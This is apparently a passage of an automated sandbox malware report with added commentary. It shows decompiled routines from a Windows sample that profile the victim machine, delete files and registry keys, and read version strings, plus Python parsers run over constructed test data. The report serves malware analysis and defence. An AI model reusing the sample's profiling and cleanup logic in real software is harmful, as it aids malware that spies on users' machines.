                                                                                    								__eflags = _t118;
                                                                                    							} while (_t118 != 0);
                                                                                    						} else {
                                                                                    							_t61 = _t133 + 0x1f4; // 0x1f4
                                                                                    							memcpy(_t61,  &_v428, 0x32 << 2);
                                                                                    							_t193 = _t193 + 0xc;
                                                                                    							_t148 = 0;
                                                                                    						}
                                                                                    						_t165 = _a12;
                                                                                    						_t68 = _t133 + 0x2bc; // 0x2bc
                                                                                    						_t184 = _t68 - _t165;
                                                                                    						__eflags = _t184;
                                                                                    						do {
                                                                                    							_t119 =  *_t165 & 0x0000ffff;
                                                                                    							_t69 =  &(_t165[1]); // 0x0
                                                                                    							_t165 = _t69;
                                                                                    							 *(_t184 + _t165 - 2) = _t119;
                                                                                    							__eflags = _t119;
                                                                                    						} while (_t119 != 0);
                                                                                    						_push(_t148);
                                                                                    						_push(0x3f);
                                                                                    						_push(_v788);
                                                                                    						 *((intOrPtr*)(_t133 + 4)) = _a16;
                                                                                    						E04EB1C60(_v808);
                                                                                    						E04ED573F(_t133);
                                                                                    						__eflags = _v40 ^ _t193 + 0x00000004;
                                                                                    						return E04ED572E(_v40 ^ _t193 + 0x00000004, _t133);
                                                                                    					}
                                                                                    				} else {
                                                                                    					L3:
                                                                                    					return E04ED572E(_v8 ^ _t190);
                                                                                    				}
                                                                                    			}
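The function above assembles a victim-profile record (first byte set to 0x99) from gethostname, GetSystemInfo, the "~MHz" value under HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0, GlobalMemoryStatusEx, GetTickCount and GetCurrentProcessId, storing each value at a fixed offset in the allocated block. The parser below is an added example written for this page; it is not code from the sample or from the sandbox report. It decodes such a record from a memory dump or a captured buffer using the offsets visible in the listing. Each field's meaning is inferred from the API call whose result lands at that offset: the three UTF-16 strings at 0x190, 0x1f4 and 0x2bc come from the function's arguments and from helper lookups whose contents the listing does not show, so they are named generically; treating the dword at 0x154 as total RAM in MiB is an assumption; the sample record is constructed test data.

```python
import struct

# Offsets of the fields written by the decompiled function above. Each
# offset is taken directly from the listing; the meaning is inferred from
# the Windows API call whose result is stored there.
OFF_MSG_TYPE  = 0x000   # byte : set to 0x99 (*_t133 = 0x99)
OFF_CPU_COUNT = 0x14c   # WORD : SYSTEM_INFO.dwNumberOfProcessors
OFF_CPU_MHZ   = 0x150   # DWORD: CentralProcessor\0 "~MHz" registry value
OFF_MEM       = 0x154   # DWORD: GlobalMemoryStatusEx value >> 20 (assumed: total RAM in MiB)
OFF_HOSTNAME  = 0x158   # 0x32 bytes, ANSI, copied from the gethostname() buffer
OFF_WSTR1     = 0x190   # UTF-16LE string, bounded by the next field (0x64 bytes)
OFF_WSTR2     = 0x1f4   # UTF-16LE string, bounded by the next field (0xc8 bytes)
OFF_WSTR3     = 0x2bc   # UTF-16LE string, bounded by the next field (0x28 bytes)
OFF_TICKS     = 0x348   # DWORD: GetTickCount()
OFF_PID       = 0x34c   # DWORD: GetCurrentProcessId()
RECORD_MIN_LEN = 0x350  # last field ends here; the real allocation is larger

# Byte budget for each wide string: the listing copies each string until its
# terminating NUL with no length check, so the next field is the only bound.
FIELD_LIMITS = {
    OFF_WSTR1: OFF_WSTR2 - OFF_WSTR1,
    OFF_WSTR2: OFF_WSTR3 - OFF_WSTR2,
    OFF_WSTR3: 0x2e4 - OFF_WSTR3,
}


def _ansi_field(buf, off, length):
    """Fixed-width ANSI field, NUL-terminated or NUL-padded."""
    raw = bytes(buf[off:off + length])
    return raw.split(b"\x00", 1)[0].decode("latin-1")


def _utf16_field(buf, off, length):
    """UTF-16LE string that stops at the first wide NUL or at the field boundary,
    so an overrun caused by the unchecked copy loop never reads the next field."""
    raw = bytes(buf[off:off + (length & ~1)])
    for i in range(0, len(raw), 2):
        if raw[i] == 0 and raw[i + 1] == 0:
            raw = raw[:i]
            break
    return raw.decode("utf-16-le", errors="replace")


def parse_profile_record(buf):
    """Decode one profile record as laid out by the function in the listing."""
    if len(buf) < RECORD_MIN_LEN:
        raise ValueError("buffer shorter than 0x%x bytes" % RECORD_MIN_LEN)
    if buf[OFF_MSG_TYPE] != 0x99:
        raise ValueError("unexpected message type 0x%02x" % buf[OFF_MSG_TYPE])
    return {
        "msg_type": buf[OFF_MSG_TYPE],
        "cpu_count": struct.unpack_from("<H", buf, OFF_CPU_COUNT)[0],
        "cpu_mhz": struct.unpack_from("<I", buf, OFF_CPU_MHZ)[0],
        "mem_mib": struct.unpack_from("<I", buf, OFF_MEM)[0],
        "hostname": _ansi_field(buf, OFF_HOSTNAME, 0x32),
        "wstr1": _utf16_field(buf, OFF_WSTR1, FIELD_LIMITS[OFF_WSTR1]),
        "wstr2": _utf16_field(buf, OFF_WSTR2, FIELD_LIMITS[OFF_WSTR2]),
        "wstr3": _utf16_field(buf, OFF_WSTR3, FIELD_LIMITS[OFF_WSTR3]),
        "tick_count": struct.unpack_from("<I", buf, OFF_TICKS)[0],
        "pid": struct.unpack_from("<I", buf, OFF_PID)[0],
    }


def build_sample_record():
    """Constructed test record (values invented here, not data from the sample)."""
    rec = bytearray(RECORD_MIN_LEN)
    rec[OFF_MSG_TYPE] = 0x99
    struct.pack_into("<H", rec, OFF_CPU_COUNT, 4)
    struct.pack_into("<I", rec, OFF_CPU_MHZ, 2400)
    struct.pack_into("<I", rec, OFF_MEM, 8192)
    host = b"DESKTOP-TEST01"
    rec[OFF_HOSTNAME:OFF_HOSTNAME + len(host)] = host
    for off, text in ((OFF_WSTR1, "field-a"), (OFF_WSTR2, "field-b"), (OFF_WSTR3, "field-c")):
        enc = text.encode("utf-16-le")
        rec[off:off + len(enc)] = enc
    struct.pack_into("<I", rec, OFF_TICKS, 123456)
    struct.pack_into("<I", rec, OFF_PID, 4242)
    return bytes(rec)


if __name__ == "__main__":
    for name, value in parse_profile_record(build_sample_record()).items():
        print("%-10s %r" % (name, value))
```

To use it on real data, carve the block starting at the byte equal to 0x99 that precedes the hostname by 0x158 bytes and pass at least 0x350 bytes to parse_profile_record; the tick count and PID at the end give a quick sanity check against the process that produced the dump.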
Instruction address column for this function (0x04ecad50 .. 0x04ecb05a), shown beside the decompiled statements in the original two-column listing; the per-statement alignment did not survive extraction.
                                                                                    0x04ecb05e
                                                                                    0x04ecb062
                                                                                    0x04ecb06a
                                                                                    0x04ecb07e
                                                                                    0x04ecb088
                                                                                    0x04ecb088
                                                                                    0x04ecad9a
                                                                                    0x04ecad9a
                                                                                    0x04ecadb0
                                                                                    0x04ecadb0

                                                                                    APIs
                                                                                      • Part of subcall function 04EB62B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB6350
                                                                                      • Part of subcall function 04EB62B0: RegCloseKey.ADVAPI32(04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB635D
                                                                                    • GetTickCount.KERNEL32 ref: 04ECAE19
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 04ECAE25
                                                                                    • gethostname.WS2_32(?,00000100), ref: 04ECAE6A
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 04ECAEFB
                                                                                    • RegOpenKeyW.ADVAPI32 ref: 04ECAF2C
                                                                                    • RegQueryValueExW.ADVAPI32(00000004,~MHz,00000000,00000004,00000004,?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 04ECAF4C
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,?), ref: 04ECAF56
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 04ECAF73
                                                                                    • CoInitialize.OLE32(00000000), ref: 04ECAF90
                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000002), ref: 04ECAFA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$CountCurrentGlobalInfoInitializeMemoryProcessQueryStatusSystemTickUninitializeValuegethostname
                                                                                    • String ID: /$@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                    • API String ID: 3586792383-1973391949
                                                                                    • Opcode ID: 211c3b46e36ce97cf7c2f3167de591454ee8d12c2ad7367409ca1472b8c77c9c
                                                                                    • Instruction ID: 6ae32726082f3e57f4171b876e2f09853016f7351878eedcb075500074970592
                                                                                    • Opcode Fuzzy Hash: 211c3b46e36ce97cf7c2f3167de591454ee8d12c2ad7367409ca1472b8c77c9c
                                                                                    • Instruction Fuzzy Hash: 4A91CE71504385CFEB11DF64C984BAAB7E4FF88308F04556DED899B241EB34AA85CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 89%
                                                                                    			E04EBA820(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				short _v1128;
                                                                                    				void* _v1132;
                                                                                    				signed int _t22;
                                                                                    				void* _t50;
                                                                                    				signed int _t64;
                                                                                    				void* _t69;
                                                                                    
                                                                                    				_t69 = __eflags;
                                                                                    				_t63 = __esi;
                                                                                    				_t62 = __edi;
                                                                                    				_t22 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t22 ^ _t64;
                                                                                    				_t50 = __ecx;
                                                                                    				_push(0);
                                                                                    				E04EC6330(__ecx, L"winssyslog",  &_v608, __edi, __esi, 8);
                                                                                    				DeleteFileW( &_v608);
                                                                                    				E04EB78A0(_t50, L"Control", 0x1fffffff, __edi, __esi, _t69);
                                                                                    				E04EC6010(_t50, L"Global",  &_v88, __edi, __esi);
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				_v1132 = 0;
                                                                                    				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v1132) == 0) {
                                                                                    					SHDeleteKeyW(_v1132, 0x4efb5d0);
                                                                                    					RegCloseKey(_v1132);
                                                                                    				}
                                                                                    				E04EC6010(_t50, L"Pg",  &_v88, _t62, _t63);
                                                                                    				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				_v1132 = 0;
                                                                                    				if(RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20106,  &_v1132) == 0) {
                                                                                    					SHDeleteKeyW(_v1132, 0x4efb5d0);
                                                                                    					RegCloseKey(_v1132);
                                                                                    				}
                                                                                    				CreateEventA(0, 1, 0, _t50 + 0xc);
                                                                                    				return E04ED572E(_v8 ^ _t64);
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6330: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC6356
                                                                                    • DeleteFileW.KERNEL32(?), ref: 04EBA854
                                                                                      • Part of subcall function 04EB78A0: wsprintfW.USER32 ref: 04EB78CF
                                                                                      • Part of subcall function 04EB78A0: RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EB7909
                                                                                      • Part of subcall function 04EB78A0: RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EB792A
                                                                                      • Part of subcall function 04EB78A0: RegCloseKey.ADVAPI32(?), ref: 04EB7940
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBA886
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 04EBA8B3
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EBA8C8
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA8D4
                                                                                    • wsprintfW.USER32 ref: 04EBA8F7
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 04EBA924
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EBA939
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBA945
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 04EBA955
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                                                    • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                                                    • API String ID: 164381605-1386177884
                                                                                    • Opcode ID: e8ac6f4ed923127f89c637b8f54f2481bde2e6d7f0519ff9e1f0e76d1952470b
                                                                                    • Instruction ID: 1fe96452a157f9c1a7e7aa153a855bc9d57352524747dfc00b0f5ee5e7382fa1
                                                                                    • Opcode Fuzzy Hash: e8ac6f4ed923127f89c637b8f54f2481bde2e6d7f0519ff9e1f0e76d1952470b
                                                                                    • Instruction Fuzzy Hash: 2431C470900218ABEB10DFA0DC4AFED777DEB84705F104199AF06E6084EE756E88CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 92%
                                                                                    			E04EC5D90(void* __ebx, short* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				void* _v532;
                                                                                    				int _v536;
                                                                                    				short* _v540;
                                                                                    				void* _v544;
                                                                                    				int _v548;
                                                                                    				int _v552;
                                                                                    				intOrPtr _v556;
                                                                                    				intOrPtr _v560;
                                                                                    				signed int _t45;
                                                                                    				intOrPtr _t47;
                                                                                    				intOrPtr _t48;
                                                                                    				intOrPtr _t49;
                                                                                    				short _t50;
                                                                                    				int _t54;
                                                                                    				signed int _t81;
                                                                                    				signed int _t82;
                                                                                    				signed int _t83;
                                                                                    				signed int _t88;
                                                                                    				short* _t89;
                                                                                    				signed int _t90;
                                                                                    				signed int _t91;
                                                                                    				signed short* _t94;
                                                                                    				signed short* _t95;
                                                                                    				signed short* _t96;
                                                                                    				short* _t98;
                                                                                    				void* _t100;
                                                                                    				void* _t102;
                                                                                    				intOrPtr* _t104;
                                                                                    				void* _t105;
                                                                                    				intOrPtr* _t107;
                                                                                    				void* _t108;
                                                                                    				signed int _t109;
                                                                                    				void* _t110;
                                                                                    				void* _t111;
                                                                                    				void* _t113;
                                                                                    				void* _t114;
                                                                                    
                                                                                    				_t89 = __ecx;
                                                                                    				_t45 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t45 ^ _t109;
                                                                                    				_t47 =  *0x4efd690; // 0x2a
                                                                                    				_t107 = _a4;
                                                                                    				_t104 = _a8;
                                                                                    				 *((intOrPtr*)(__edx)) = _t47;
                                                                                    				_t48 =  *0x4efd690; // 0x2a
                                                                                    				_v556 = __edx;
                                                                                    				_t98 =  &(__ecx[1]);
                                                                                    				 *_t104 = _t48;
                                                                                    				_t49 =  *0x4efd690; // 0x2a
                                                                                    				_v540 = __ecx;
                                                                                    				_v560 = _t104;
                                                                                    				 *_t107 = _t49;
                                                                                    				do {
                                                                                    					_t50 =  *_t89;
                                                                                    					_t89 =  &(_t89[1]);
                                                                                    				} while (_t50 != 0);
                                                                                    				_t90 = _t89 - _t98;
                                                                                    				_t91 = _t90 >> 1;
                                                                                    				if(_t90 != 0) {
                                                                                    					_t54 = GetFileVersionInfoSizeW(_v540,  &_v552);
                                                                                    					_v548 = _t54;
                                                                                    					_t118 = _t54;
                                                                                    					if(_t54 != 0) {
                                                                                    						_push(_t54);
                                                                                    						_t105 = E04ED5785(_t91, _t107, _t118);
                                                                                    						_t111 = _t110 + 4;
                                                                                    						if(_t105 != 0) {
                                                                                    							if(GetFileVersionInfoW(_v540, _v552, _v548, _t105) != 0 && VerQueryValueW(_t105, L"\\VarFileInfo\\Translation",  &_v544,  &_v536) != 0) {
                                                                                    								_t88 = ( *_v544 & 0x0000ffff) << 0x00000010 |  *(_v544 + 2) & 0x0000ffff;
                                                                                    								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\FileDescription", _t88);
                                                                                    								_t113 = _t111 + 0xc;
                                                                                    								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                                                    									_t96 = _v532;
                                                                                    									_t102 = _v556 - _t96;
                                                                                    									do {
                                                                                    										_t83 =  *_t96 & 0x0000ffff;
                                                                                    										_t96 =  &(_t96[1]);
                                                                                    										 *(_t102 + _t96 - 2) = _t83;
                                                                                    									} while (_t83 != 0);
                                                                                    								}
                                                                                    								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\CompanyName", _t88);
                                                                                    								_t114 = _t113 + 0xc;
                                                                                    								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                                                    									_t95 = _v532;
                                                                                    									_t100 = _v560 - _t95;
                                                                                    									asm("o16 nop [eax+eax]");
                                                                                    									do {
                                                                                    										_t82 =  *_t95 & 0x0000ffff;
                                                                                    										_t95 =  &(_t95[1]);
                                                                                    										 *(_t100 + _t95 - 2) = _t82;
                                                                                    									} while (_t82 != 0);
                                                                                    								}
                                                                                    								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\ProductVersion", _t88);
                                                                                    								_t111 = _t114 + 0xc;
                                                                                    								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                                                    									_t94 = _v532;
                                                                                    									_t108 = _t107 - _t94;
                                                                                    									do {
                                                                                    										_t81 =  *_t94 & 0x0000ffff;
                                                                                    										_t94 =  &(_t94[1]);
                                                                                    										 *(_t108 + _t94 - 2) = _t81;
                                                                                    									} while (_t81 != 0);
                                                                                    								}
                                                                                    							}
                                                                                    							E04ED573F(_t105);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t109);
                                                                                    			}

                                                                                    Instruction addresses (the address column belonging to the listing above, in order):
                                                                                    0x04ec5d90, 0x04ec5d99, 0x04ec5da0, 0x04ec5da3, 0x04ec5daa, 0x04ec5db0, 0x04ec5db3, 0x04ec5db5, 0x04ec5dba, 0x04ec5dc0, 0x04ec5dc3, 0x04ec5dc5, 0x04ec5dca, 0x04ec5dd0, 0x04ec5dd6, 0x04ec5de0, 0x04ec5de0, 0x04ec5de3, 0x04ec5de6, 0x04ec5deb, 0x04ec5ded, 0x04ec5def, 0x04ec5e02, 0x04ec5e08, 0x04ec5e0e, 0x04ec5e10, 0x04ec5e16, 0x04ec5e1c, 0x04ec5e1e, 0x04ec5e23, 0x04ec5e44, 0x04ec5e7c, 0x04ec5e8b, 0x04ec5e91, 0x04ec5eb2, 0x04ec5eba, 0x04ec5ec0, 0x04ec5ec2, 0x04ec5ec2, 0x04ec5ec5, 0x04ec5ec8, 0x04ec5ecd, 0x04ec5ec2, 0x04ec5edf, 0x04ec5ee5, 0x04ec5f06, 0x04ec5f0e, 0x04ec5f14, 0x04ec5f16, 0x04ec5f20, 0x04ec5f20, 0x04ec5f23, 0x04ec5f26, 0x04ec5f2b, 0x04ec5f20, 0x04ec5f3d, 0x04ec5f43, 0x04ec5f64, 0x04ec5f66, 0x04ec5f6c, 0x04ec5f70, 0x04ec5f70, 0x04ec5f73, 0x04ec5f76, 0x04ec5f7b, 0x04ec5f70, 0x04ec5f80, 0x04ec5f83, 0x04ec5f88, 0x04ec5e23, 0x04ec5e10, 0x04ec5f9d

                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?,00000001,74E069A0,00000000), ref: 04EC5E02
                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 04EC5E3C
                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 04EC5E5E
                                                                                    • wsprintfW.USER32 ref: 04EC5E8B
                                                                                    • VerQueryValueW.VERSION(00000000,?,?,?), ref: 04EC5EAA
                                                                                    • wsprintfW.USER32 ref: 04EC5EDF
                                                                                    • VerQueryValueW.VERSION(00000000,?,?,?), ref: 04EC5EFE
                                                                                    • wsprintfW.USER32 ref: 04EC5F3D
                                                                                    • VerQueryValueW.VERSION(00000000,?,?,?), ref: 04EC5F5C
                                                                                    Strings
                                                                                    • \StringFileInfo\%08lx\FileDescription, xrefs: 04EC5E85
                                                                                    • \VarFileInfo\Translation, xrefs: 04EC5E58
                                                                                    • \StringFileInfo\%08lx\CompanyName, xrefs: 04EC5ED9
                                                                                    • \StringFileInfo\%08lx\ProductVersion, xrefs: 04EC5F37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue$wsprintf$FileInfoVersion$Size
                                                                                    • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                                                    • API String ID: 2317827058-2104189134
                                                                                    • Opcode ID: 86b17c8ada29fd596d544851fbbbf47f48e8aedb5927798631e0d20ef5243617
                                                                                    • Instruction ID: 11e48267e807b1705e42d11ef744526273bb0424d8e6bd60ad9471ad216cd88c
                                                                                    • Opcode Fuzzy Hash: 86b17c8ada29fd596d544851fbbbf47f48e8aedb5927798631e0d20ef5243617
                                                                                    • Instruction Fuzzy Hash: BA514F75900219ABCB25CF65DD88EEAB7B8EF44305F1451D9E809D7204EB35BA85CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
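
The API and string list above shows the lookup order the function uses: GetFileVersionInfoSizeW and GetFileVersionInfoW load the VS_VERSIONINFO resource, VerQueryValueW reads \VarFileInfo\Translation, wsprintfW formats that value into \StringFileInfo\%08lx\<name>, and three more VerQueryValueW calls fetch FileDescription, CompanyName and ProductVersion. One detail a reviewer should check in such code: the Translation value is a language WORD followed by a code-page WORD, and the string-table name is those two words as hex with the language first (040904b0 for en-US/Unicode). Formatting the unswapped DWORD with %08lx prints the code page first (04b00409), which matches no table; whether the sample swaps the halves before wsprintfW is not visible in this excerpt. The script below is an added example, not the sample's or Joe Sandbox's code: it reconstructs the same walk offline with a small VS_VERSIONINFO parser standing in for VerQueryValueW, over a resource blob constructed inline, and shows both the correct key and the reversed one. All function names, the blob contents and the en-US/Unicode table are assumptions of the example; only the first Translation pair is used, as a single %08lx key implies.

```python
r"""
Offline reconstruction of the lookup the function above performs with the
VERSION.dll APIs: read \VarFileInfo\Translation, build the
\StringFileInfo\<lang><codepage>\<name> key and fetch FileDescription,
CompanyName and ProductVersion.  Added example, not the sample's code; the
VS_VERSIONINFO blob is constructed here so the script runs with no PE file.
"""
import struct


def _align4(n: int) -> int:
    return (n + 3) & ~3


def _wstr(s: str) -> bytes:
    """Null-terminated UTF-16LE string, the form keys and String values take in the resource."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_block(key: str, value: bytes = b"", text: bool = False, children=()) -> bytes:
    """Serialize one VS_VERSIONINFO-style block: header, key, padding, value, padding, children."""
    body = bytearray(6)                       # wLength, wValueLength, wType patched in below
    body += _wstr(key)
    body += b"\x00" * (_align4(len(body)) - len(body))
    body += value
    body += b"\x00" * (_align4(len(body)) - len(body))
    for child in children:
        body += b"\x00" * (_align4(len(body)) - len(body))
        body += child
    value_len = len(value) // 2 if text else len(value)   # text values are counted in WCHARs
    struct.pack_into("<HHH", body, 0, len(body), value_len, 1 if text else 0)
    return bytes(body)


def parse_block(buf: bytes, off: int = 0):
    """Parse the block at buf[off:]; returns (key, value_bytes, children, end_offset)."""
    length, value_len, kind = struct.unpack_from("<HHH", buf, off)
    end = off + length
    pos = off + 6
    chars = []
    while True:                                # key is null-terminated UTF-16, read in WCHAR steps
        (ch,) = struct.unpack_from("<H", buf, pos)
        pos += 2
        if ch == 0:
            break
        chars.append(chr(ch))
    pos = _align4(pos)
    nbytes = value_len * 2 if kind == 1 else value_len
    value = buf[pos:pos + nbytes]
    pos = _align4(pos + nbytes)
    children = []
    while pos < end:
        child = parse_block(buf, pos)
        children.append(child)
        pos = _align4(child[3])
    return "".join(chars), value, children, end


def query_value(root, path: str):
    """VerQueryValueW look-alike: walk a backslash path such as \\StringFileInfo\\040904b0\\CompanyName."""
    node = root
    for part in [p for p in path.split("\\") if p]:
        node = next((c for c in node[2] if c[0].lower() == part.lower()), None)
        if node is None:
            return None
    return node[1]


def string_table_key(translation: bytes) -> str:
    """Correct table name: language WORD then code-page WORD, each as four hex digits."""
    lang, codepage = struct.unpack_from("<HH", translation, 0)
    return f"{lang:04x}{codepage:04x}"


def raw_dword_key(translation: bytes) -> str:
    """What %08lx on the unswapped Translation DWORD yields: code page first, so the wrong table name."""
    (dword,) = struct.unpack_from("<I", translation, 0)
    return f"{dword:08x}"


def read_strings(blob: bytes) -> dict:
    """The sample's sequence: Translation -> formatted key -> the three string values."""
    root = parse_block(blob)
    translation = query_value(root, "\\VarFileInfo\\Translation")
    if translation is None or len(translation) < 4:
        return {}
    table = string_table_key(translation)       # first lang/codepage pair only
    out = {}
    for name in ("FileDescription", "CompanyName", "ProductVersion"):
        raw = query_value(root, f"\\StringFileInfo\\{table}\\{name}")
        if raw is not None:
            out[name] = raw.decode("utf-16-le").rstrip("\x00")
    return out


# Constructed resource (not from the sample): en-US (0x0409) / Unicode (0x04B0) string table and a matching Translation entry.
FIXED_FILE_INFO = struct.pack("<13I", 0xFEEF04BD, 0x00010000, *([0] * 11))
SAMPLE_BLOB = build_block("VS_VERSION_INFO", FIXED_FILE_INFO, children=[
    build_block("StringFileInfo", text=True, children=[
        build_block("040904b0", text=True, children=[
            build_block("FileDescription", _wstr("Example Service Host"), text=True),
            build_block("CompanyName", _wstr("Example Corp"), text=True),
            build_block("ProductVersion", _wstr("1.2.3.4"), text=True),
        ]),
    ]),
    build_block("VarFileInfo", text=True, children=[
        build_block("Translation", struct.pack("<HH", 0x0409, 0x04B0)),
    ]),
])

if __name__ == "__main__":
    print(read_strings(SAMPLE_BLOB))
```

Against the constructed blob, read_strings returns the three strings under the 040904b0 table, while a query under the reversed 04b00409 key finds nothing. Pointing parse_block at the bytes of a real RT_VERSION resource extracted from a PE works the same way, which is useful when reproducing the sample's fingerprinting logic on a non-Windows analysis host.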

                                                                                    C-Code - Quality: 92%
                                                                                    			E04ED5490(LONG* __ecx, signed int __edx, long _a4) {
                                                                                    				long _v8;
                                                                                    				signed int _v12;
                                                                                    				void* _v16;
                                                                                    				long _t38;
                                                                                    				long _t52;
                                                                                    				unsigned int _t64;
                                                                                    				void* _t67;
                                                                                    				void* _t68;
                                                                                    				void** _t71;
                                                                                    				void* _t72;
                                                                                    				void** _t75;
                                                                                    				void* _t76;
                                                                                    				long _t82;
                                                                                    				LONG* _t88;
                                                                                    				void* _t89;
                                                                                    
                                                                                    				_v12 = __edx;
                                                                                    				_t88 = __ecx;
                                                                                    				if(_a4 == 0) {
                                                                                    					if(__ecx[1] == 0) {
                                                                                    						L24:
                                                                                    						return _t38;
                                                                                    					}
                                                                                    					_t64 = 0xaaaaaaab * __edx >> 0x20 >> 1;   /* unsigned __edx / 3 (multiply-by-reciprocal division) */
                                                                                    					if(_t64 >= 0x3a98) {                       /* clamp the interval to [1000, 15000] ms */
                                                                                    						_t64 = 0x3a98;
                                                                                    					} else {
                                                                                    						if(_t64 <= 0x3e8) {
                                                                                    							_t64 = 0x3e8;
                                                                                    						}
                                                                                    					}
                                                                                    					_t38 =  <  ? 0x7fffffff : timeGetTime() - _t88[4];
                                                                                    					if(_t38 < _t64) {
                                                                                    						goto L24;
                                                                                    					} else {
                                                                                    						_t82 = 0;
                                                                                    						_a4 = 1;
                                                                                    						_v8 = 0;
                                                                                    						_t38 = InterlockedCompareExchange(_t88, 1, 0);   /* try to take the spinlock held in the first field */
                                                                                    						asm("sbb ebx, ebx");
                                                                                    						_t67 =  ~_t38 + 1;
                                                                                    						if(_t67 == 0) {
                                                                                    							goto L24;
                                                                                    						}
                                                                                    						L12:
                                                                                    						if(_a4 != 0) {
                                                                                    							_a4 = 0;
                                                                                    							_t52 = timeGetTime();
                                                                                    							_t82 = _t52;
                                                                                    							_v8 = _t82;
                                                                                    							if(_t82 == 0) {
                                                                                    								_t52 = timeGetTime();
                                                                                    							}
                                                                                    							_t88[4] = _t52;
                                                                                    						}
                                                                                    						_t38 = _t88[2];
                                                                                    						_t75 =  *(_t38 + 4);
                                                                                    						if(_t75 == 0) {
                                                                                    							goto L22;
                                                                                    						}
                                                                                    						_t76 =  *_t75;
                                                                                    						_v16 = _t76;
                                                                                    						_t38 = _t82 -  *((intOrPtr*)(_t76 + 0x34));   /* now (timeGetTime) minus the field at +0x34, treated as the entry's age in ms */
                                                                                    						if(_t38 < _v12) {                               /* head entry younger than the threshold: nothing more to reap */
                                                                                    							goto L22;
                                                                                    						}
                                                                                    						_t88[2] =  *(_t88[2] + 4);                      /* unlink the head entry and drop the count */
                                                                                    						InterlockedDecrement( &(_t88[1]));
                                                                                    						_push(8);
                                                                                    						E04ED5777(_t88[2]);
                                                                                    						_t89 = _t89 + 8;
